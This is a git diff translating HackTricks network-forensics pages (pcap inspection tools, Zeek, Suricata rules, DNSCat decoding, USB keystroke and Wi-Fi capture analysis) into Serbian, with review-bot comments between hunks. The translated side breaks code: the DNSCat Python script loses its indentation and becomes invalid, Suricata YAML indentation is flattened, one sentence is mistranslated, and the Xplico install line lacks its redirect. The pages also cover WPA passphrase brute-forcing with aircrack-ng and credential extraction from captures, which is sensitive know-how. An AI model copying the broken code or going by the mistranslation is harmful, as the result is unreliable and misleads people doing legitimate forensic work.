alata](https://binvis.io/#/). -#### Features of BinVis +#### Karakteristike BinVis -- Visual and active **structure viewer** -- Multiple plots for different focus points -- Focusing on portions of a sample -- **Seeing stings and resources**, in PE or ELF executables e. g. -- Getting **patterns** for cryptanalysis on files -- **Spotting** packer or encoder algorithms -- **Identify** Steganography by patterns -- **Visual** binary-diffing +- Vizuelni i aktivni **pregledač strukture** +- Više grafova za različite tačke fokusa +- Fokusiranje na delove uzorka +- **Prikazivanje stringova i resursa**, u PE ili ELF izvršnim datotekama npr. 
+- Dobijanje **šablona** za kriptoanalizu na fajlovima +- **Prepoznavanje** pakera ili enkodera +- **Identifikacija** steganografije po šablonima +- **Vizuelno** binarno upoređivanje -BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario. +BinVis je odlična **polazna tačka za upoznavanje sa nepoznatim ciljem** u scenariju crne kutije. -## Specific Data Carving Tools +## Specifični alati za vađenje podataka ### FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Pretražuje AES ključeve tražeći njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker. -Download [here](https://sourceforge.net/projects/findaes/). +Preuzmite [ovde](https://sourceforge.net/projects/findaes/). -## Complementary tools +## Komplementarni alati -You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Možete koristiti [**viu**](https://github.com/atanunq/viu) da vidite slike iz terminala.\ +Možete koristiti linux komandnu liniju **pdftotext** da transformišete pdf u tekst i pročitate ga. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index c16bee711..3c2c5e921 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -1,33 +1,27 @@ -# Pcap Inspection +# Pcap Inspekcija {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] -> A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. +> Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite s njom u nekim drugim alatima. -## Online tools for pcaps +## Online alati za pcaps -- If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -- Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) -- Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) -- **Full pcap analysis from the browser in** [**https://apackets.com/**](https://apackets.com/) +- Ako je zaglavlje vašeg pcap-a **pokvareno**, trebali biste pokušati da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +- Ekstrahujte **informacije** i tražite **malver** unutar pcap-a u [**PacketTotal**](https://packettotal.com) +- Tražite **malicioznu aktivnost** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) +- 
**Potpuna pcap analiza iz pregledača u** [**https://apackets.com/**](https://apackets.com/) -## Extract Information +## Ekstrahovanje informacija -The following tools are useful to extract statistics, files, etc. +Sledeći alati su korisni za ekstrakciju statistike, datoteka itd. ### Wireshark > [!NOTE] -> **If you are going to analyze a PCAP you basically must to know how to use Wireshark** +> **Ako planirate da analizirate PCAP, osnovno je da znate kako da koristite Wireshark** -You can find some Wireshark tricks in: +Možete pronaći neke Wireshark trikove u: {{#ref}} wireshark-tricks.md 
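Review bot: this hunk does more than translate: it deletes the RootedCON sponsor block at the top of pcap-inspection/README.md (the `<figure>` image, the `[**RootedCON**]` paragraph and the `{% embed url="https://www.rootedcon.com/" %}` line), which is why the hunk shrinks from 33 to 27 lines. The commit subject only says "Translated", so either restore the block in translated form or state the removal explicitly in the commit message; the same block is removed again before `+## Proverite Eksploite/Malver` in the next hunk, so whichever way it goes should apply to both places.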
@@ -35,115 +29,97 @@ wireshark-tricks.md ### [**https://apackets.com/**](https://apackets.com/) -Pcap analysis from the browser. +Pcap analiza iz pregledača. ### Xplico Framework -[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. - -**Install** +[**Xplico** ](https://github.com/xplico/xplico)_(samo linux)_ može **analizirati** **pcap** i ekstrahovati informacije iz njega. Na primer, iz pcap datoteke Xplico ekstrahuje svaku email poruku (POP, IMAP i SMTP protokoli), sav HTTP sadržaj, svaki VoIP poziv (SIP), FTP, TFTP, i tako dalje. +**Instalirajte** ```bash sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-get update sudo apt-get install xplico ``` - -**Run** - +**Pokreni** ``` /etc/init.d/apache2 restart /etc/init.d/xplico start ``` +Pristupite _**127.0.0.1:9876**_ sa kredencijalima _**xplico:xplico**_ -Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ - -Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. +Zatim kreirajte **novi slučaj**, kreirajte **novu sesiju** unutar slučaja i **otpremite pcap** datoteku. ### NetworkMiner -Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\ -This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way. +Poput Xplico, to je alat za **analizu i ekstrakciju objekata iz pcaps**. Ima besplatnu verziju koju možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). 
Radi sa **Windows**.\ +Ovaj alat je takođe koristan za dobijanje **druge analizirane informacije** iz paketa kako biste mogli brže saznati šta se dešava. ### NetWitness Investigator -You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ -This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**. +Možete preuzeti [**NetWitness Investigator odavde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows)**.\ +Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način da **znate šta se dešava unutra**. ### [BruteShark](https://github.com/odedshimon/BruteShark) -- Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) -- Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -- Build a visual network diagram (Network nodes & users) -- Extract DNS queries -- Reconstruct all TCP & UDP Sessions +- Ekstrakcija i kodiranje korisničkih imena i lozinki (HTTP, FTP, Telnet, IMAP, SMTP...) +- Ekstrakcija autentifikacionih hash-ova i njihovo razbijanje pomoću Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +- Izrada vizuelnog dijagrama mreže (Mrežni čvorovi i korisnici) +- Ekstrakcija DNS upita +- Rekonstrukcija svih TCP i UDP sesija - File Carving ### Capinfos - ``` capinfos capture.pcap ``` - ### Ngrep -If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters: - +Ako **tražite** **nešto** unutar pcap-a, možete koristiti **ngrep**. 
Evo primera koji koristi glavne filtre: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` +### Isecanje -### Carving - -Using common carving techniques can be useful to extract files and information from the pcap: +Korišćenje uobičajenih tehnika isecanja može biti korisno za ekstrakciju fajlova i informacija iz pcap: {{#ref}} ../partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} -### Capturing credentials +### Hvatanje kredencijala -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Možete koristiti alate kao što je [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Check Exploits/Malware +## Proverite Eksploite/Malver ### Suricata -**Install and setup** - +**Instalirajte i postavite** ``` apt-get install suricata apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` - -**Check pcap** - +**Proveri pcap** ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` - ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alat koji -- Reads a PCAP File and Extracts Http Streams. -- gzip deflates any compressed streams -- Scans every file with yara -- Writes a report.txt -- Optionally saves matching files to a Dir +- Čita PCAP datoteku i ekstrahuje Http tokove. +- gzip dekompresuje sve kompresovane tokove +- Skandira svaku datoteku sa yara +- Piše report.txt +- Opcionalno čuva odgovarajuće datoteke u direktorijum ### Malware Analysis -Check if you can find any fingerprint of a known malware: +Proverite da li možete pronaći bilo koji otisak poznatog malvera: {{#ref}} ../malware-analysis.md 
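Review bot: `+- Skandira svaku datoteku sa yara` in the YaraPcap list has a typo; it should be `Skenira`. Two more points in this hunk: `+### Isecanje` introduces a third rendering of "carving" (the partitions README keeps `File carving`, the recovery-tools file uses `vađenje podataka`), so pick one term and use it across all three files; and since the `+**Instalirajte**` line directly above the Xplico block is touched, it is worth fixing the block itself, whose `echo "deb ..." /etc/apt/sources.list` has no `>>`, so it prints the path instead of appending the repository line (`sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" >> /etc/apt/sources.list'`).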
@@ -151,12 +127,11 @@ Check if you can find any fingerprint of a known malware: ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. +> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator mrežnog saobraćaja. Mnogi operateri koriste Zeek kao Mrežni Sigurnosni Monitor (NSM) za podršku istragama sumnjivih ili zlonamernih aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja van domena sigurnosti, uključujući merenje performansi i rešavanje problema. -Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. +U suštini, logovi koje kreira `zeek` nisu **pcaps**. Stoga ćete morati da koristite **druge alate** za analizu logova gde se nalaze **informacije** o pcaps. ### Connections Info - ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) @@ -206,9 +181,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` - -### DNS info - +### DNS informacije ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers 
@@ -225,8 +198,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` - -## Other pcap analysis tricks +## Ostali trikovi analize pcap-a {{#ref}} dnscat-exfiltration.md @@ -242,10 +214,4 @@ usb-keystrokes.md ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index aba634f34..138792211 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -1,11 +1,10 @@ -# DNSCat pcap analysis +# DNSCat pcap analiza {{#include ../../../banners/hacktricks-training.md}} -If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. - -You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**: +Ako imate pcap sa podacima koji se **ekstrahuju putem DNSCat** (bez korišćenja enkripcije), možete pronaći ekstrahovani sadržaj. +Samo treba da znate da su **prvih 9 bajtova** lažni podaci, već su povezani sa **C\&C komunikacijom**: ```python from scapy.all import rdpcap, DNSQR, DNSRR import struct 
@@ -13,25 +12,22 @@ import struct f = "" last = "" for p in rdpcap('ch21.pcap'): - if p.haslayer(DNSQR) and not p.haslayer(DNSRR): +if p.haslayer(DNSQR) and not p.haslayer(DNSRR): - qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") - qry = ''.join(_.decode('hex') for _ in qry)[9:] - if last != qry: - print(qry) - f += qry - last = qry +qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") +qry = ''.join(_.decode('hex') for _ in qry)[9:] +if last != qry: +print(qry) +f += qry +last = qry #print(f) ``` - -For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ +Za više informacija: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) -There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) - +Postoji skripta koja radi sa Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) ``` python3 dnscat_decoder.py sample.pcap bad_domain ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md index 4be42c696..45a7512b8 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md 
@@ -6,14 +6,13 @@ ### Chains -In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities. +U iptables-u, liste pravila poznate kao lanci se obrađuju sekvencijalno. Među njima, tri primarna lanca su univerzalno prisutna, dok dodatni kao što je NAT mogu biti potencijalno podržani u zavisnosti od mogućnosti sistema. -- **Input Chain**: Utilized for managing the behavior of incoming connections. -- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities. -- **Output Chain**: Dedicated to the regulation of outgoing connections. - -These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system. +- **Input Chain**: Koristi se za upravljanje ponašanjem dolaznih konekcija. +- **Forward Chain**: Koristi se za rukovanje dolaznim konekcijama koje nisu namenjene lokalnom sistemu. Ovo je tipično za uređaje koji deluju kao ruteri, gde su podaci koji se primaju namenjeni za prosleđivanje na drugu destinaciju. Ovaj lanac je relevantan prvenstveno kada je sistem uključen u rutiranje, NAT-ovanje ili slične aktivnosti. +- **Output Chain**: Posvećen regulaciji odlaznih konekcija. +Ovi lanci osiguravaju urednu obradu mrežnog saobraćaja, omogućavajući precizno definisanje detaljnih pravila koja upravljaju protokom podataka u, kroz i iz sistema. ```bash # Delete all rules iptables -F 
@@ -50,11 +49,9 @@ iptables-save > /etc/sysconfig/iptables ip6tables-save > /etc/sysconfig/ip6tables iptables-restore < /etc/sysconfig/iptables ``` - ## Suricata -### Install & Config - +### Instalacija i Konfiguracija ```bash # Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages # Ubuntu @@ -64,7 +61,7 @@ apt-get install suricata # Debian echo "deb http://http.debian.net/debian buster-backports main" > \ - /etc/apt/sources.list.d/backports.list +/etc/apt/sources.list.d/backports.list apt-get update apt-get install suricata -t buster-backports @@ -80,7 +77,7 @@ suricata-update ## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml default-rule-path: /var/lib/suricata/rules rule-files: - - suricata.rules +- suricata.rules # Run ## Add rules in /etc/suricata/rules/suricata.rules @@ -92,7 +89,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0 suricatasc -c ruleset-reload-nonblocking ## or set the follogin in /etc/suricata/suricata.yaml detect-engine: - - rule-reload: true +- rule-reload: true # Validate suricata config suricata -T -c /etc/suricata/suricata.yaml -v @@ -101,8 +98,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v ## Config drop to generate alerts ## Search for the following lines in /etc/suricata/suricata.yaml and remove comments: - drop: - alerts: yes - flows: all +alerts: yes +flows: all ## Forward all packages to the queue where suricata can act as IPS iptables -I INPUT -j NFQUEUE 
@@ -120,76 +117,70 @@ Type=simple systemctl daemon-reload ``` +### Pravila Definicije -### Rules Definitions - -[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following: - -- The **action**, determines what happens when the signature matches. -- The **header**, defines the protocol, IP addresses, ports and direction of the rule. -- The **rule options**, define the specifics of the rule. +[Iz dokumenata:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) Pravilo/potpis se sastoji od sledećeg: +- **akcija**, određuje šta se dešava kada se potpis poklapa. +- **zaglavlje**, definiše protokol, IP adrese, portove i pravac pravila. +- **opcije pravila**, definišu specifičnosti pravila. ```bash alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;) ``` +#### **Validne akcije su** -#### **Valid actions are** +- alert - generiši upozorenje +- pass - zaustavi dalju inspekciju paketa +- **drop** - odbaci paket i generiši upozorenje +- **reject** - pošalji RST/ICMP grešku nedostupnosti pošiljaocu odgovarajućeg paketa. +- rejectsrc - isto kao _reject_ +- rejectdst - pošalji RST/ICMP grešku paketa primaocu odgovarajućeg paketa. +- rejectboth - pošalji RST/ICMP greške paketa obe strane razgovora. -- alert - generate an alert -- pass - stop further inspection of the packet -- **drop** - drop packet and generate alert -- **reject** - send RST/ICMP unreachable error to the sender of the matching packet. -- rejectsrc - same as just _reject_ -- rejectdst - send RST/ICMP error packet to the receiver of the matching packet. -- rejectboth - send RST/ICMP error packets to both sides of the conversation. 
+#### **Protokoli** -#### **Protocols** - -- tcp (for tcp-traffic) +- tcp (za tcp-traffic) - udp - icmp -- ip (ip stands for ‘all’ or ‘any’) -- _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) +- ip (ip znači ‘svi’ ili ‘bilo koji’) +- _layer7 protokoli_: http, ftp, tls, smb, dns, ssh... (više u [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) -#### Source and Destination Addresses +#### Izvori i odredišne adrese -It supports IP ranges, negations and a list of addresses: +Podržava IP opsege, negacije i listu adresa: -| Example | Meaning | -| ----------------------------- | ---------------------------------------- | -| ! 1.1.1.1 | Every IP address but 1.1.1.1 | -| !\[1.1.1.1, 1.1.1.2] | Every IP address but 1.1.1.1 and 1.1.1.2 | -| $HOME_NET | Your setting of HOME_NET in yaml | -| \[$EXTERNAL\_NET, !$HOME_NET] | EXTERNAL_NET and not HOME_NET | -| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 except for 10.0.0.5 | +| Primer | Značenje | +| ----------------------------- | ----------------------------------------- | +| ! 
1.1.1.1 | Svaka IP adresa osim 1.1.1.1 | +| !\[1.1.1.1, 1.1.1.2] | Svaka IP adresa osim 1.1.1.1 i 1.1.1.2 | +| $HOME_NET | Vaša postavka HOME_NET u yaml | +| \[$EXTERNAL\_NET, !$HOME_NET] | EXTERNAL_NET i ne HOME_NET | +| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 osim 10.0.0.5 | -#### Source and Destination Ports +#### Izvori i odredišne portove -It supports port ranges, negations and lists of ports +Podržava opsege portova, negacije i liste portova -| Example | Meaning | +| Primer | Značenje | | --------------- | -------------------------------------- | -| any | any address | -| \[80, 81, 82] | port 80, 81 and 82 | -| \[80: 82] | Range from 80 till 82 | -| \[1024: ] | From 1024 till the highest port-number | -| !80 | Every port but 80 | -| \[80:100,!99] | Range from 80 till 100 but 99 excluded | -| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4 | +| any | bilo koja adresa | +| \[80, 81, 82] | port 80, 81 i 82 | +| \[80: 82] | Opseg od 80 do 82 | +| \[1024: ] | Od 1024 do najvećeg broja porta | +| !80 | Svaki port osim 80 | +| \[80:100,!99] | Opseg od 80 do 100 osim 99 | +| \[1:80,!\[2,4]] | Opseg od 1-80, osim portova 2 i 4 | -#### Direction - -It's possible to indicate the direction of the communication rule being applied: +#### Smer +Moguće je naznačiti smer komunikacijske pravila koja se primenjuje: ``` source -> destination source <> destination (both directions) ``` +#### Ključne reči -#### Keywords - -There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more! - +Postoji **stotine opcija** dostupnih u Suricati za pretragu **specifičnog paketa** koji tražite, ovde će biti pomenuto ako se pronađe nešto zanimljivo. Proverite [**dokumentaciju**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) za više informacija! 
```bash # Meta Keywords msg: "description"; #Set a description to the rule @@ -230,5 +221,4 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;) ## Drop by port drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;) ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 782e405aa..ee1b4dfc4 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md 
@@ -2,18 +2,16 @@ {{#include ../../../banners/hacktricks-training.md}} -If you have a pcap containing the communication via USB of a keyboard like the following one: +Ako imate pcap koji sadrži komunikaciju putem USB-a tastature kao što je sledeća: ![](<../../../images/image (962).png>) -You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) to get what was written in the communication: - +Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) da dobijete ono što je napisano u komunikaciji: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` - -You can read more information and find some scripts about how to analyse this in: +Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na: - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index f1371d5fa..c331e1298 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md 
@@ -1,10 +1,10 @@ -# Wifi Pcap Analysis +# Wifi Pcap Analiza {{#include ../../../banners/hacktricks-training.md}} -## Check BSSIDs +## Proverite BSSID-ove -When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_: +Kada primite snimak čiji je glavni saobraćaj Wifi koristeći WireShark, možete početi da istražujete sve SSID-ove snimka sa _Wireless --> WLAN Traffic_: ![](<../../../images/image (106).png>) 
@@ -12,29 +12,27 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c ### Brute Force -One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: - +Jedna od kolona tog ekrana pokazuje da li je **bilo kakva autentifikacija pronađena unutar pcap-a**. Ako je to slučaj, možete pokušati da je brute force-ujete koristeći `aircrack-ng`: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` +Na primer, dobiće WPA lozinku koja štiti PSK (pre shared-key), koja će biti potrebna za dekriptovanje saobraćaja kasnije. -For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later. +## Podaci u Beacon-ima / Sporedni Kanal -## Data in Beacons / Side Channel +Ako sumnjate da se **podaci curi unutar beacon-a Wifi mreže**, možete proveriti beacon-e mreže koristeći filter kao što je sledeći: `wlan contains `, ili `wlan.ssid == "NAMEofNETWORK"` pretražujući unutar filtriranih paketa za sumnjive stringove. -If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. 
+## Pronađite Nepoznate MAC Adrese u Wifi Mreži -## Find Unknown MAC Addresses in A Wifi Network - -The following link will be useful to find the **machines sending data inside a Wifi Network**: +Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar Wifi mreže**: - `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +Ako već znate **MAC adrese, možete ih ukloniti iz izlaza** dodajući provere kao što je ova: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic. +Kada detektujete **nepoznate MAC** adrese koje komuniciraju unutar mreže, možete koristiti **filtre** kao što je sledeći: `wlan.addr== && (ftp || http || ssh || telnet)` da filtrirate njihov saobraćaj. Imajte na umu da su ftp/http/ssh/telnet filteri korisni ako ste dekriptovali saobraćaj. -## Decrypt Traffic +## Dekriptovanje Saobraćaja Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 6565bd680..68b3b68aa 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md 
